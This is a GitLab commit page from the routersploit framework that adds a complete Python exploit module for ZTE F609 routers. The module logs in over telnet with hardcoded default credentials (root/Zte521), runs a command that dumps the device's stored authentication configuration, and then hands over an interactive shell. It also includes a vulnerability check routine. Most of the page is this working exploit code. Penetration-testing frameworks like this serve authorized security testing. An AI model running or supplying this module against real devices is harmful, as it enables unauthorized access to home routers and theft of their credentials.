Skip to content
Projects
Groups
Snippets
Help
This project
Loading...
Sign in / Register
Toggle navigation
R
routersploit
Overview
Overview
Details
Activity
Cycle Analytics
Repository
Repository
Files
Commits
Branches
Tags
Contributors
Graph
Compare
Charts
Issues
0
Issues
0
List
Board
Labels
Milestones
Merge Requests
0
Merge Requests
0
CI / CD
CI / CD
Pipelines
Jobs
Schedules
Charts
Wiki
Wiki
Snippets
Snippets
Members
Members
Collapse sidebar
Close sidebar
Activity
Graph
Charts
Create a new issue
Jobs
Commits
Issue Boards
Open sidebar
czos-dpend
routersploit
Commits
4a5f0619
Commit
4a5f0619
authored
Jun 19, 2016
by
Marcin Bury
Committed by
GitHub
Jun 19, 2016
Browse files
Options
Browse Files
Download
Plain Diff
Merge pull request #98 from devilscream/master
Adding ZTE F609 Config Disclosure exploit
parents
3293a140
6b3dc9bd
Hide whitespace changes
Inline
Side-by-side
Showing
1 changed file
with
83 additions
and
0 deletions
+83
-0
f609_config_disclosure.py
routersploit/modules/exploits/zte/f609_config_disclosure.py
+83
-0
No files found.
routersploit/modules/exploits/zte/f609_config_disclosure.py
0 → 100644
View file @
4a5f0619
import
telnetlib
from
routersploit
import
(
exploits
,
print_status
,
print_success
,
print_error
,
mute
,
)
class
Exploit
(
exploits
.
Exploit
):
"""
Exploit implementation for ZTE F609 Config Disclosure.
If the target is vulnerable it is possible to authenticate to the device"
"""
__info__
=
{
'name'
:
'ZTE F609 Config Disclosure'
,
'description'
:
'Module exploits ZTE F609 Config Disclosure. If the target is possible to authentiate to the device.'
,
'authors'
:
[
'devilscream'
,
# routersploit module
],
'references'
:
[
'https://www.youtube.com/watch?v=YlUqPbhzJLk'
,
],
'devices'
:
[
'ZTE ZXHN F609'
,
]
}
target
=
exploits
.
Option
(
''
,
'Target address e.g. 192.168.1.1'
)
# target address
username
=
exploits
.
Option
(
"root"
,
"Username to authenticate with"
)
# telnet username, default root
password
=
exploits
.
Option
(
"Zte521"
,
"Password to authenticate with"
)
# telnet password, default Zte521
config
=
"sendcmd 1 DB p DevAuthInfo"
def
run
(
self
):
try
:
print_status
(
"Trying to authenticate to the telnet server"
)
tn
=
telnetlib
.
Telnet
(
self
.
target
,
23
)
tn
.
expect
([
"Login: "
,
"login: "
],
5
)
tn
.
write
(
self
.
username
+
"
\r\n
"
)
tn
.
expect
([
"Password: "
,
"password"
],
5
)
tn
.
write
(
self
.
password
+
"
\r\n
"
)
(
i
,
obj
,
res
)
=
tn
.
expect
([
"Incorrect"
,
"incorrect"
],
5
)
if
i
!=
-
1
:
print_error
(
"Exploit failed"
)
else
:
if
any
(
map
(
lambda
x
:
x
in
res
,
[
"#"
,
"$"
,
">"
])):
print_success
(
"Authentication successful"
)
print_status
(
"Displaying configuration:"
)
tn
.
write
(
self
.
config
+
"
\r\n
"
)
tn
.
interact
()
else
:
print_error
(
"Exploit failed"
)
tn
.
close
()
except
:
print_error
(
"Connection error: {}:{}"
.
format
(
self
.
target
,
23
))
@mute
def
check
(
self
):
try
:
tn
=
telnetlib
.
Telnet
(
self
.
target
,
23
)
tn
.
expect
([
"Login: "
,
"login: "
],
5
)
tn
.
write
(
self
.
username
+
"
\r\n
"
)
tn
.
expect
([
"Password: "
,
"password"
],
5
)
tn
.
write
(
self
.
password
+
"
\r\n
"
)
tn
.
write
(
self
.
config
+
"
\r\n
"
)
(
i
,
obj
,
res
)
=
tn
.
expect
([
"Incorrect"
,
"incorrect"
],
5
)
tn
.
close
()
if
i
!=
-
1
:
return
False
# target is not vulnerable
else
:
if
"<DM name="
in
res
:
return
True
# target is vulnerable
except
:
return
False
# target is not vulnerable
return
False
# target is not vulnerable
Write
Preview
Markdown
is supported
0%
Try again
or
attach a new file
Attach a file
Cancel
You are about to add
0
people
to the discussion. Proceed with caution.
Finish editing this message first!
Cancel
Please
register
or
sign in
to comment